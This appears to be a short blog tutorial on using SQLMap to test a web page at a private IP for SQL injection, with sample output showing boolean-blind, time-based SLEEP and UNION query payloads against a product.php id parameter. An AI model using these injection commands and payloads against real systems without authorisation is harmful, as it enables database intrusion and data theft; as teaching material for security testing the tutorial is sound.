SQLMap: Unleashing the Power of SQL Injection Testing with SQLMap


undefined

What is SQLMap?

SQLMap is a powerful tool designed to detect and exploit SQL injection vulnerabilities in web applications. Developed in Python, SQLMap is available as an open-source tool and is well-regarded for its extensive range of features and capabilities. It supports various database management systems (DBMS) and can automatically identify vulnerabilities within a target web application, enabling security professionals to rectify them proactively.

If you are using Kali Linux, SQLMap comes pre-installed. To locate SQLMap, simply open a terminal  and you can access the tool directly from the command line by typing "sqlmap".


For this example, let's assume that you have identified a web application with the IP address 192.168.10.10 and suspect that it might be vulnerable to SQL injection. To test this hypothesis using SQLMap, follow these steps:



Step 1: Launch SQLMap: 
Open a terminal in Kali Linux and type the following command to start SQLMap

sqlmap



Step 2: Specify the Target: 
Next, you need to specify the target URL (or IP address) for the web application you want to test. In this case, we'll use a database hosted at the IP address 192.168.10.10


sqlmap -u http://192.168.10.10/product.php?id=1




Step 3: Start the Scan: 
Once you've specified the target, SQLMap will automatically begin scanning the application for potential SQL injection vulnerabilities. The tool will perform a series of tests and checks to identify any exploitable points.

Step 4: Review the Results:
After completing the scan, SQLMap will display the results of its assessment. Pay close attention to any vulnerabilities identified, as well as the risk level associated with each finding.

 [INFO] testing connection to the target URL
[INFO] analyzing target URL
[INFO] testing if the target URL is vulnerable to SQL injection
[INFO] the target URL is vulnerable to SQL injection (parameter: id)

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://example.com/product.php?id=1' AND 5678=5678-- -

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://example.com/product.php?id=1' AND (SELECT 7737 FROM (SELECT(SLEEP(5)))dQqy)-- -

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 20 columns
    Payload: http://example.com/product.php?id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- -

[INFO] fetched data from the target URL
Database management system:
    MySQL
    Version: 5.7.32

[INFO] total database(s) retrieved: 1
[INFO] retrieved data from database "example_db":
    Table: products
    [1 entry]
        +-----+---------------+-------------+
        | id  |   product     |   price     |
        +-----+---------------+-------------+
        | 1   |  Product A    |  $25.99     |
        +-----+---------------+-------------+


Step 5: Exploit the Vulnerabilities:
If SQLMap detects any SQL injection vulnerabilities, you have the option to exploit them directly from the tool.




No comments

Powered by Blogger.